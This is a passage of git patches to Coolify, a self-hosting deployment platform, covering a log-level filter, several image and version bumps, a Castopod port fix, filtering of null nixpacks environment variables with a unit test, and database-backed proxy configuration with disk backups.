                     line.classList.add('log-info');
                 }
             });

From a73360e5036ed38e90b54bc4af1a5f803416fa86 Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Fri, 6 Mar 2026 10:53:30 +0530
Subject: [PATCH 033/213] feat(ui): add log filter based on log level

---
 .../project/shared/get-logs.blade.php         | 75 ++++++++++++++++---
 1 file changed, 65 insertions(+), 10 deletions(-)

diff --git a/resources/views/livewire/project/shared/get-logs.blade.php b/resources/views/livewire/project/shared/get-logs.blade.php
index 1df4bae7e..ee5b65cf5 100644
--- a/resources/views/livewire/project/shared/get-logs.blade.php
+++ b/resources/views/livewire/project/shared/get-logs.blade.php
@@ -8,6 +8,7 @@
         rafId: null,
         scrollDebounce: null,
         colorLogs: localStorage.getItem('coolify-color-logs') === 'true',
+        logFilters: JSON.parse(localStorage.getItem('coolify-log-filters')) || {error: true, warning: true, debug: true, info: true},
         searchQuery: '',
         matchCount: 0,
         containerName: '{{ $container ?? "logs" }}',
@@ -70,6 +71,17 @@
                 }
             }, 150);
         },
+        getLogLevel(content) {
+            if (/\b(error|err|failed|failure|exception|fatal|panic|critical)\b/.test(content)) return 'error';
+            if (/\b(warn|warning|wrn|caution)\b/.test(content)) return 'warning';
+            if (/\b(debug|dbg|trace|verbose)\b/.test(content)) return 'debug';
+            return 'info';
+        },
+        toggleLogFilter(level) {
+            this.logFilters[level] = !this.logFilters[level];
+            localStorage.setItem('coolify-log-filters', JSON.stringify(this.logFilters));
+            this.applySearch();
+        },
         toggleColorLogs() {
             this.colorLogs = !this.colorLogs;
             localStorage.setItem('coolify-color-logs', this.colorLogs);
@@ -81,17 +93,11 @@
             const lines = logs.querySelectorAll('[data-log-line]');
             lines.forEach(line => {
                 const content = (line.dataset.logContent || '').toLowerCase();
+                const level = this.getLogLevel(content);
+                line.dataset.logLevel = level;
                 line.classList.remove('log-error', 'log-warning', 'log-debug', 'log-info');
                 if (!this.colorLogs) return;
-                if (/\b(error|err|failed|failure|exception|fatal|panic|critical)\b/.test(content)) {
-                    line.classList.add('log-error');
-                } else if (/\b(warn|warning|wrn|caution)\b/.test(content)) {
-                    line.classList.add('log-warning');
-                } else if (/\b(debug|dbg|trace|verbose)\b/.test(content)) {
-                    line.classList.add('log-debug');
-                } else {
-                    line.classList.add('log-info');
-                }
+                line.classList.add('log-' + level);
             });
         },
         hasActiveLogSelection() {
@@ -118,7 +124,10 @@
             lines.forEach(line => {
                 const content = (line.dataset.logContent || '').toLowerCase();
                 const textSpan = line.querySelector('[data-line-text]');
-                const matches = !query || content.includes(query);
+                const level = line.dataset.logLevel || this.getLogLevel(content);
+                const passesFilter = this.logFilters[level] !== false;
+                const matchesSearch = !query || content.includes(query);
+                const matches = passesFilter && matchesSearch;
 
                 line.classList.toggle('hidden', !matches);
                 if (matches && query) count++;
@@ -389,6 +398,52 @@ class="p-1 text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-
                                     d="M9.53 16.122a3 3 0 0 0-5.78 1.128 2.25 2.25 0 0 1-2.4 2.245 4.5 4.5 0 0 0 8.4-2.245c0-.399-.078-.78-.22-1.128Zm0 0a15.998 15.998 0 0 0 3.388-1.62m-5.043-.025a15.994 15.994 0 0 1 1.622-3.395m3.42 3.42a15.995 15.995 0 0 0 4.764-4.648l3.876-5.814a1.151 1.151 0 0 0-1.597-1.597L14.146 6.32a15.996 15.996 0 0 0-4.649 4.763m3.42 3.42a6.776 6.776 0 0 0-3.42-3.42" />
                             </svg>
                         </button>
+                        <div x-data="{ filterOpen: false }" class="relative">
+                            <button x-on:click="filterOpen = !filterOpen" title="Filter Log Levels"
+                                :class="Object.values(logFilters).some(v => !v) ? '!text-warning' : ''"
+                                class="p-1 text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200">
+                                <svg class="w-4 h-4" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24"
+                                    stroke-width="1.5" stroke="currentColor">
+                                    <path stroke-linecap="round" stroke-linejoin="round"
+                                        d="M12 3c2.755 0 5.455.232 8.083.678.533.09.917.556.917 1.096v1.044a2.25 2.25 0 0 1-.659 1.591l-5.432 5.432a2.25 2.25 0 0 0-.659 1.591v2.927a2.25 2.25 0 0 1-1.244 2.013L9.75 21v-6.568a2.25 2.25 0 0 0-.659-1.591L3.659 7.409A2.25 2.25 0 0 1 3 5.818V4.774c0-.54.384-1.006.917-1.096A48.32 48.32 0 0 1 12 3Z" />
+                                </svg>
+                            </button>
+                            <div x-show="filterOpen" x-on:click.away="filterOpen = false"
+                                x-transition:enter="transition ease-out duration-100"
+                                x-transition:enter-start="transform opacity-0 scale-95"
+                                x-transition:enter-end="transform opacity-100 scale-100"
+                                x-transition:leave="transition ease-in duration-75"
+                                x-transition:leave-start="transform opacity-100 scale-100"
+                                x-transition:leave-end="transform opacity-0 scale-95"
+                                class="absolute right-0 z-50 mt-2 w-max origin-top-right rounded-md bg-white dark:bg-coolgray-200 shadow-lg ring-1 ring-neutral-200 dark:ring-coolgray-300 focus:outline-none">
+                                <div class="py-1">
+                                    <label class="flex items-center gap-2 px-4 py-1.5 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-coolgray-300 cursor-pointer select-none">
+                                        <input type="checkbox" :checked="logFilters.error" x-on:change="toggleLogFilter('error')"
+                                            class="rounded border-gray-300 dark:border-gray-600 text-warning focus:ring-warning dark:bg-coolgray-300" />
+                                        <span class="w-2.5 h-2.5 rounded-full bg-red-500"></span>
+                                        Error
+                                    </label>
+                                    <label class="flex items-center gap-2 px-4 py-1.5 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-coolgray-300 cursor-pointer select-none">
+                                        <input type="checkbox" :checked="logFilters.warning" x-on:change="toggleLogFilter('warning')"
+                                            class="rounded border-gray-300 dark:border-gray-600 text-warning focus:ring-warning dark:bg-coolgray-300" />
+                                        <span class="w-2.5 h-2.5 rounded-full bg-yellow-500"></span>
+                                        Warning
+                                    </label>
+                                    <label class="flex items-center gap-2 px-4 py-1.5 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-coolgray-300 cursor-pointer select-none">
+                                        <input type="checkbox" :checked="logFilters.debug" x-on:change="toggleLogFilter('debug')"
+                                            class="rounded border-gray-300 dark:border-gray-600 text-warning focus:ring-warning dark:bg-coolgray-300" />
+                                        <span class="w-2.5 h-2.5 rounded-full bg-purple-500"></span>
+                                        Debug
+                                    </label>
+                                    <label class="flex items-center gap-2 px-4 py-1.5 text-sm text-gray-700 dark:text-gray-200 hover:bg-gray-100 dark:hover:bg-coolgray-300 cursor-pointer select-none">
+                                        <input type="checkbox" :checked="logFilters.info" x-on:change="toggleLogFilter('info')"
+                                            class="rounded border-gray-300 dark:border-gray-600 text-warning focus:ring-warning dark:bg-coolgray-300" />
+                                        <span class="w-2.5 h-2.5 rounded-full bg-blue-500"></span>
+                                        Info
+                                    </label>
+                                </div>
+                            </div>
+                        </div>
                         <button title="Follow Logs" :class="alwaysScroll ? '!text-warning' : ''"
                             x-on:click="toggleScroll"
                             class="p-1 text-gray-500 hover:text-gray-700 dark:text-gray-400 dark:hover:text-gray-200">

From 18118f1d612970b1316a12c62e52116cd35cdd48 Mon Sep 17 00:00:00 2001
From: Michael Chan <michael@chan.gg>
Date: Sun, 8 Mar 2026 01:08:18 -0500
Subject: [PATCH 034/213] fixup

---
 templates/compose/n8n-with-postgres-and-worker.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates/compose/n8n-with-postgres-and-worker.yaml b/templates/compose/n8n-with-postgres-and-worker.yaml
index d2235e479..b7d381399 100644
--- a/templates/compose/n8n-with-postgres-and-worker.yaml
+++ b/templates/compose/n8n-with-postgres-and-worker.yaml
@@ -7,7 +7,7 @@
 
 services:
   n8n:
-    image: n8nio/n8n:2.10.2
+    image: n8nio/n8n:2.10.4
     environment:
       - SERVICE_URL_N8N_5678
       - N8N_EDITOR_BASE_URL=${SERVICE_URL_N8N}
@@ -54,7 +54,7 @@ services:
       retries: 10
 
   n8n-worker:
-    image: n8nio/n8n:2.10.2
+    image: n8nio/n8n:2.10.4
     command: worker
     environment:
       - GENERIC_TIMEZONE=${GENERIC_TIMEZONE:-UTC}
@@ -122,7 +122,7 @@ services:
       retries: 10
 
   task-runners:
-    image: n8nio/runners:2.10.2
+    image: n8nio/runners:2.10.4
     environment:
       - N8N_RUNNERS_TASK_BROKER_URI=${N8N_RUNNERS_TASK_BROKER_URI:-http://n8n-worker:5679}
       - N8N_RUNNERS_AUTH_TOKEN=$SERVICE_PASSWORD_N8N

From db46af89b1a688e710e6ab146d8ce2316f21a5e8 Mon Sep 17 00:00:00 2001
From: Bernhard Millauer <SeriousM@users.noreply.github.com>
Date: Sun, 8 Mar 2026 18:54:14 +0100
Subject: [PATCH 035/213] Change Castopod service port from 8000 to 8080

The current port mapping 8000 is wrong and the service is never reachable.

As stated in https://docs.castopod.org/main/en/getting-started/docker/, the docker container is exposing 8080.
---
 templates/compose/castopod.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/templates/compose/castopod.yaml b/templates/compose/castopod.yaml
index 6c6e8c4d5..c43f4fba5 100644
--- a/templates/compose/castopod.yaml
+++ b/templates/compose/castopod.yaml
@@ -3,7 +3,7 @@
 # category: media
 # tags: podcast, media, audio, video, streaming, hosting, platform, castopod
 # logo: svgs/castopod.svg
-# port: 8000
+# port: 8080
 
 services:
   castopod:
@@ -11,7 +11,7 @@ services:
     volumes:
       - castopod-media:/var/www/castopod/public/media
     environment:
-      - SERVICE_URL_CASTOPOD_8000
+      - SERVICE_URL_CASTOPOD_8080
       - MYSQL_DATABASE=castopod
       - MYSQL_USER=$SERVICE_USER_MYSQL
       - MYSQL_PASSWORD=$SERVICE_PASSWORD_MYSQL
@@ -27,7 +27,7 @@ services:
           "CMD",
           "curl",
           "-f",
-          "http://localhost:8000/health"
+          "http://localhost:8080/health"
         ]
       interval: 5s
       timeout: 20s

From b926f238242f7127cd4d399400d660f4124b0848 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 12:01:02 +0100
Subject: [PATCH 036/213] version++

---
 config/constants.php        |  2 +-
 openapi.json                | 27 +++++++++++++++++++++++++++
 openapi.yaml                | 21 +++++++++++++++++++++
 other/nightly/versions.json | 10 +++++-----
 versions.json               |  4 ++--
 5 files changed, 56 insertions(+), 8 deletions(-)

diff --git a/config/constants.php b/config/constants.php
index bb6efb983..0fc20fbc3 100644
--- a/config/constants.php
+++ b/config/constants.php
@@ -2,7 +2,7 @@
 
 return [
     'coolify' => [
-        'version' => '4.0.0-beta.466',
+        'version' => '4.0.0-beta.467',
         'helper_version' => '1.0.12',
         'realtime_version' => '1.0.11',
         'self_hosted' => env('SELF_HOSTED', true),
diff --git a/openapi.json b/openapi.json
index 69f5ef53d..849dee363 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3339,6 +3339,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -5864,6 +5873,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -10561,6 +10579,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
diff --git a/openapi.yaml b/openapi.yaml
index fab3df54e..226295cdb 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2111,6 +2111,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop application.'
@@ -3806,6 +3813,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop database.'
@@ -6645,6 +6659,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop service.'
diff --git a/other/nightly/versions.json b/other/nightly/versions.json
index 1ce790111..565329c00 100644
--- a/other/nightly/versions.json
+++ b/other/nightly/versions.json
@@ -1,19 +1,19 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.463"
+            "version": "4.0.0-beta.467"
         },
         "nightly": {
-            "version": "4.0.0-beta.464"
+            "version": "4.0.0-beta.468"
         },
         "helper": {
             "version": "1.0.12"
         },
         "realtime": {
-            "version": "1.0.10"
+            "version": "1.0.11"
         },
         "sentinel": {
-            "version": "0.0.18"
+            "version": "0.0.19"
         }
     },
     "traefik": {
@@ -26,4 +26,4 @@
         "v3.0": "3.0.4",
         "v2.11": "2.11.32"
     }
-}
\ No newline at end of file
+}
diff --git a/versions.json b/versions.json
index 10b85e0e6..565329c00 100644
--- a/versions.json
+++ b/versions.json
@@ -1,10 +1,10 @@
 {
     "coolify": {
         "v4": {
-            "version": "4.0.0-beta.466"
+            "version": "4.0.0-beta.467"
         },
         "nightly": {
-            "version": "4.0.0-beta.467"
+            "version": "4.0.0-beta.468"
         },
         "helper": {
             "version": "1.0.12"

From a7f491170a9f8fcc0342df9f0779e5420b69c53d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 13:41:34 +0100
Subject: [PATCH 037/213] fix(deployment): filter null and empty environment
 variables from nixpacks plan

When application->fqdn is null, COOLIFY_FQDN and COOLIFY_URL are set to null.
These null values cause nixpacks to fail parsing the config with
"invalid type: null, expected a string".

Filter out null and empty string values when generating environment variables
for the nixpacks plan JSON. Fixes #6830.
---
 app/Jobs/ApplicationDeploymentJob.php         |  6 ++-
 openapi.json                                  | 27 ++++++++++++
 openapi.yaml                                  | 21 ++++++++++
 ...plicationDeploymentNixpacksNullEnvTest.php | 42 +++++++++++++++++++
 4 files changed, 94 insertions(+), 2 deletions(-)

diff --git a/app/Jobs/ApplicationDeploymentJob.php b/app/Jobs/ApplicationDeploymentJob.php
index a41355966..c80d31ab3 100644
--- a/app/Jobs/ApplicationDeploymentJob.php
+++ b/app/Jobs/ApplicationDeploymentJob.php
@@ -2196,7 +2196,7 @@ private function clone_repository()
         $this->create_workdir();
         $this->execute_remote_command(
             [
-                executeInDocker($this->deployment_uuid, "cd {$this->workdir} && git log -1 ".escapeshellarg($this->commit)." --pretty=%B"),
+                executeInDocker($this->deployment_uuid, "cd {$this->workdir} && git log -1 ".escapeshellarg($this->commit).' --pretty=%B'),
                 'hidden' => true,
                 'save' => 'commit_message',
             ]
@@ -2462,7 +2462,9 @@ private function generate_env_variables()
 
         $coolify_envs = $this->generate_coolify_env_variables(forBuildTime: true);
         $coolify_envs->each(function ($value, $key) {
-            $this->env_args->put($key, $value);
+            if (! is_null($value) && $value !== '') {
+                $this->env_args->put($key, $value);
+            }
         });
 
         // For build process, include only environment variables where is_buildtime = true
diff --git a/openapi.json b/openapi.json
index 69f5ef53d..849dee363 100644
--- a/openapi.json
+++ b/openapi.json
@@ -3339,6 +3339,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -5864,6 +5873,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
@@ -10561,6 +10579,15 @@
                         "schema": {
                             "type": "string"
                         }
+                    },
+                    {
+                        "name": "docker_cleanup",
+                        "in": "query",
+                        "description": "Perform docker cleanup (prune networks, volumes, etc.).",
+                        "schema": {
+                            "type": "boolean",
+                            "default": true
+                        }
                     }
                 ],
                 "responses": {
diff --git a/openapi.yaml b/openapi.yaml
index fab3df54e..226295cdb 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -2111,6 +2111,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop application.'
@@ -3806,6 +3813,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop database.'
@@ -6645,6 +6659,13 @@ paths:
           required: true
           schema:
             type: string
+        -
+          name: docker_cleanup
+          in: query
+          description: 'Perform docker cleanup (prune networks, volumes, etc.).'
+          schema:
+            type: boolean
+            default: true
       responses:
         '200':
           description: 'Stop service.'
diff --git a/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php b/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
index bd925444a..c2a8d46fa 100644
--- a/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
+++ b/tests/Unit/ApplicationDeploymentNixpacksNullEnvTest.php
@@ -236,6 +236,48 @@
     expect($envArgs)->toBe('');
 });
 
+it('filters out null coolify env variables from env_args used in nixpacks plan JSON', function () {
+    // This test verifies the fix for GitHub issue #6830:
+    // When application->fqdn is null, COOLIFY_FQDN/COOLIFY_URL get set to null
+    // in generate_coolify_env_variables(). The generate_env_variables() method
+    // merges these into env_args which become the nixpacks plan JSON "variables".
+    // Nixpacks requires all variable values to be strings, so null causes:
+    // "Error: Failed to parse Nixpacks config file - invalid type: null, expected a string"
+
+    // Simulate the coolify env collection with null values (as produced when fqdn is null)
+    $coolify_envs = collect([
+        'COOLIFY_URL' => null,
+        'COOLIFY_FQDN' => null,
+        'COOLIFY_BRANCH' => 'main',
+        'COOLIFY_RESOURCE_UUID' => 'abc123',
+        'COOLIFY_CONTAINER_NAME' => '',
+    ]);
+
+    // Apply the same filtering logic used in generate_env_variables()
+    $env_args = collect([]);
+    $coolify_envs->each(function ($value, $key) use ($env_args) {
+        if (! is_null($value) && $value !== '') {
+            $env_args->put($key, $value);
+        }
+    });
+
+    // Null values must NOT be present — they cause nixpacks JSON parse errors
+    expect($env_args->has('COOLIFY_URL'))->toBeFalse();
+    expect($env_args->has('COOLIFY_FQDN'))->toBeFalse();
+    expect($env_args->has('COOLIFY_CONTAINER_NAME'))->toBeFalse();
+
+    // Non-null values must be preserved
+    expect($env_args->get('COOLIFY_BRANCH'))->toBe('main');
+    expect($env_args->get('COOLIFY_RESOURCE_UUID'))->toBe('abc123');
+
+    // The resulting array must be safe for json_encode into nixpacks config
+    $json = json_encode(['variables' => $env_args->toArray()], JSON_PRETTY_PRINT);
+    $parsed = json_decode($json, true);
+    foreach ($parsed['variables'] as $value) {
+        expect($value)->toBeString();
+    }
+});
+
 it('preserves environment variables with zero values', function () {
     // Mock application with nixpacks build pack
     $mockApplication = Mockery::mock(Application::class);

From 6488751fd2c65706c03abf5b34d5db6961dcf88d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 11 Mar 2026 14:11:31 +0100
Subject: [PATCH 038/213] feat(proxy): add database-backed config storage with
 disk backups

- Store proxy configuration in database as primary source for faster access
- Implement automatic timestamped backups when configuration changes
- Add backfill migration logic to recover configs from disk for legacy servers
- Simplify UI by removing loading states (config now readily available)
- Add comprehensive logging for debugging configuration generation and recovery
- Include unit tests for config recovery scenarios
---
 app/Actions/Proxy/GetProxyConfiguration.php   |  52 +++++++--
 app/Actions/Proxy/SaveProxyConfiguration.php  |  36 ++++--
 app/Livewire/Server/Proxy.php                 |   1 +
 bootstrap/helpers/proxy.php                   |   8 ++
 .../views/livewire/server/proxy.blade.php     |  54 ++++-----
 tests/Unit/ProxyConfigRecoveryTest.php        | 109 ++++++++++++++++++
 6 files changed, 210 insertions(+), 50 deletions(-)
 create mode 100644 tests/Unit/ProxyConfigRecoveryTest.php

diff --git a/app/Actions/Proxy/GetProxyConfiguration.php b/app/Actions/Proxy/GetProxyConfiguration.php
index 3aa1d8d34..de44b476f 100644
--- a/app/Actions/Proxy/GetProxyConfiguration.php
+++ b/app/Actions/Proxy/GetProxyConfiguration.php
@@ -4,6 +4,7 @@
 
 use App\Models\Server;
 use App\Services\ProxyDashboardCacheService;
+use Illuminate\Support\Facades\Log;
 use Lorisleiva\Actions\Concerns\AsAction;
 
 class GetProxyConfiguration
@@ -17,28 +18,31 @@ public function handle(Server $server, bool $forceRegenerate = false): string
             return 'OK';
         }
 
-        $proxy_path = $server->proxyPath();
         $proxy_configuration = null;
 
-        // If not forcing regeneration, try to read existing configuration
         if (! $forceRegenerate) {
-            $payload = [
-                "mkdir -p $proxy_path",
-                "cat $proxy_path/docker-compose.yml 2>/dev/null",
-            ];
-            $proxy_configuration = instant_remote_process($payload, $server, false);
+            // Primary source: database
+            $proxy_configuration = $server->proxy->get('last_saved_proxy_configuration');
+
+            // Backfill: existing servers may not have DB config yet — read from disk once
+            if (empty(trim($proxy_configuration ?? ''))) {
+                $proxy_configuration = $this->backfillFromDisk($server);
+            }
         }
 
-        // Generate default configuration if:
-        // 1. Force regenerate is requested
-        // 2. Configuration file doesn't exist or is empty
+        // Generate default configuration as last resort
         if ($forceRegenerate || empty(trim($proxy_configuration ?? ''))) {
-            // Extract custom commands from existing config before regenerating
             $custom_commands = [];
             if (! empty(trim($proxy_configuration ?? ''))) {
                 $custom_commands = extractCustomProxyCommands($server, $proxy_configuration);
             }
 
+            Log::warning('Proxy configuration regenerated to defaults', [
+                'server_id' => $server->id,
+                'server_name' => $server->name,
+                'reason' => $forceRegenerate ? 'force_regenerate' : 'config_not_found',
+            ]);
+
             $proxy_configuration = str(generateDefaultProxyConfiguration($server, $custom_commands))->trim()->value();
         }
 
@@ -50,4 +54,30 @@ public function handle(Server $server, bool $forceRegenerate = false): string
 
         return $proxy_configuration;
     }
+
+    /**
+     * Backfill: read config from disk for servers that predate DB storage.
+     * Stores the result in the database so future reads skip SSH entirely.
+     */
+    private function backfillFromDisk(Server $server): ?string
+    {
+        $proxy_path = $server->proxyPath();
+        $result = instant_remote_process([
+            "mkdir -p $proxy_path",
+            "cat $proxy_path/docker-compose.yml 2>/dev/null",
+        ], $server, false);
+
+        if (! empty(trim($result ?? ''))) {
+            $server->proxy->last_saved_proxy_configuration = $result;
+            $server->save();
+
+            Log::info('Proxy config backfilled to database from disk', [
+                'server_id' => $server->id,
+            ]);
+
+            return $result;
+        }
+
+        return null;
+    }
 }
diff --git a/app/Actions/Proxy/SaveProxyConfiguration.php b/app/Actions/Proxy/SaveProxyConfiguration.php
index 53fbecce2..bcfd5011d 100644
--- a/app/Actions/Proxy/SaveProxyConfiguration.php
+++ b/app/Actions/Proxy/SaveProxyConfiguration.php
@@ -9,19 +9,41 @@ class SaveProxyConfiguration
 {
     use AsAction;
 
+    private const MAX_BACKUPS = 10;
+
     public function handle(Server $server, string $configuration): void
     {
         $proxy_path = $server->proxyPath();
         $docker_compose_yml_base64 = base64_encode($configuration);
+        $new_hash = str($docker_compose_yml_base64)->pipe('md5')->value;
 
-        // Update the saved settings hash
-        $server->proxy->last_saved_settings = str($docker_compose_yml_base64)->pipe('md5')->value;
+        // Only create a backup if the configuration actually changed
+        $old_hash = $server->proxy->get('last_saved_settings');
+        $config_changed = $old_hash && $old_hash !== $new_hash;
+
+        // Update the saved settings hash and store full config as database backup
+        $server->proxy->last_saved_settings = $new_hash;
+        $server->proxy->last_saved_proxy_configuration = $configuration;
         $server->save();
 
-        // Transfer the configuration file to the server
-        instant_remote_process([
-            "mkdir -p $proxy_path",
-            "echo '$docker_compose_yml_base64' | base64 -d | tee $proxy_path/docker-compose.yml > /dev/null",
-        ], $server);
+        $backup_path = "$proxy_path/backups";
+
+        // Transfer the configuration file to the server, with backup if changed
+        $commands = ["mkdir -p $proxy_path"];
+
+        if ($config_changed) {
+            $short_hash = substr($old_hash, 0, 8);
+            $timestamp = now()->format('Y-m-d_H-i-s');
+            $backup_file = "docker-compose.{$timestamp}.{$short_hash}.yml";
+            $commands[] = "mkdir -p $backup_path";
+            // Skip backup if a file with the same hash already exists (identical content)
+            $commands[] = "ls $backup_path/docker-compose.*.$short_hash.yml 1>/dev/null 2>&1 || cp -f $proxy_path/docker-compose.yml $backup_path/$backup_file 2>/dev/null || true";
+            // Prune old backups, keep only the most recent ones
+            $commands[] = 'cd '.$backup_path.' && ls -1t docker-compose.*.yml 2>/dev/null | tail -n +'.((int) self::MAX_BACKUPS + 1).' | xargs rm -f 2>/dev/null || true';
+        }
+
+        $commands[] = "echo '$docker_compose_yml_base64' | base64 -d | tee $proxy_path/docker-compose.yml > /dev/null";
+
+        instant_remote_process($commands, $server);
     }
 }
diff --git a/app/Livewire/Server/Proxy.php b/app/Livewire/Server/Proxy.php
index 1a14baf89..d5f30fca0 100644
--- a/app/Livewire/Server/Proxy.php
+++ b/app/Livewire/Server/Proxy.php
@@ -51,6 +51,7 @@ public function mount()
         $this->redirectEnabled = data_get($this->server, 'proxy.redirect_enabled', true);
         $this->redirectUrl = data_get($this->server, 'proxy.redirect_url');
         $this->syncData(false);
+        $this->loadProxyConfiguration();
     }
 
     private function syncData(bool $toModel = false): void
diff --git a/bootstrap/helpers/proxy.php b/bootstrap/helpers/proxy.php
index ac52c0af8..cf9f648bb 100644
--- a/bootstrap/helpers/proxy.php
+++ b/bootstrap/helpers/proxy.php
@@ -4,6 +4,7 @@
 use App\Enums\ProxyTypes;
 use App\Models\Application;
 use App\Models\Server;
+use Illuminate\Support\Facades\Log;
 use Symfony\Component\Yaml\Yaml;
 
 /**
@@ -215,6 +216,13 @@ function extractCustomProxyCommands(Server $server, string $existing_config): ar
 }
 function generateDefaultProxyConfiguration(Server $server, array $custom_commands = [])
 {
+    Log::info('Generating default proxy configuration', [
+        'server_id' => $server->id,
+        'server_name' => $server->name,
+        'custom_commands_count' => count($custom_commands),
+        'caller' => debug_backtrace(DEBUG_BACKTRACE_IGNORE_ARGS, 3)[1]['class'] ?? 'unknown',
+    ]);
+
     $proxy_path = $server->proxyPath();
     $proxy_type = $server->proxyType();
 
diff --git a/resources/views/livewire/server/proxy.blade.php b/resources/views/livewire/server/proxy.blade.php
index 8bee1a166..e7bfc151c 100644
--- a/resources/views/livewire/server/proxy.blade.php
+++ b/resources/views/livewire/server/proxy.blade.php
@@ -1,7 +1,7 @@
 @php use App\Enums\ProxyTypes; @endphp
 <div>
     @if ($server->proxyType())
-        <div x-init="$wire.loadProxyConfiguration">
+        <div>
             @if ($selectedProxy !== 'NONE')
                 <form wire:submit='submit'>
                     <div class="flex items-center gap-2">
@@ -55,24 +55,19 @@
                             <div class="flex items-center gap-2">
                                 <h3>{{ $proxyTitle }}</h3>
                                 @can('update', $server)
-                                    <div wire:loading wire:target="loadProxyConfiguration">
-                                        <x-forms.button disabled>Reset Configuration</x-forms.button>
-                                    </div>
-                                    <div wire:loading.remove wire:target="loadProxyConfiguration">
-                                        @if ($proxySettings)
-                                            <x-modal-confirmation title="Reset Proxy Configuration?"
-                                                buttonTitle="Reset Configuration" submitAction="resetProxyConfiguration"
-                                                :actions="[
-                                                    'Reset proxy configuration to default settings',
-                                                    'All custom configurations will be lost',
-                                                    'Custom ports and entrypoints will be removed',
-                                                ]" confirmationText="{{ $server->name }}"
-                                                confirmationLabel="Please confirm by entering the server name below"
-                                                shortConfirmationLabel="Server Name" step2ButtonText="Reset Configuration"
-                                                :confirmWithPassword="false" :confirmWithText="true">
-                                            </x-modal-confirmation>
-                                        @endif
-                                    </div>
+                                    @if ($proxySettings)
+                                        <x-modal-confirmation title="Reset Proxy Configuration?"
+                                            buttonTitle="Reset Configuration" submitAction="resetProxyConfiguration"
+                                            :actions="[
+                                                'Reset proxy configuration to default settings',
+                                                'All custom configurations will be lost',
+                                                'Custom ports and entrypoints will be removed',
+                                            ]" confirmationText="{{ $server->name }}"
+                                            confirmationLabel="Please confirm by entering the server name below"
+                                            shortConfirmationLabel="Server Name" step2ButtonText="Reset Configuration"
+                                            :confirmWithPassword="false" :confirmWithText="true">
+                                        </x-modal-confirmation>
+                                    @endif
                                 @endcan
                                 @if ($server->proxyType() === ProxyTypes::TRAEFIK->value)
                                     <button type="button" x-show="traefikWarningsDismissed"
@@ -134,19 +129,14 @@ class="underline text-white">Traefik changelog</a> to understand breaking change
                             @endif
                         </div>
                     @endif
-                    <div wire:loading wire:target="loadProxyConfiguration" class="pt-4">
-                        <x-loading text="Loading proxy configuration..." />
-                    </div>
-                    <div wire:loading.remove wire:target="loadProxyConfiguration">
-                        @if ($proxySettings)
-                            <div class="flex flex-col gap-2 pt-2">
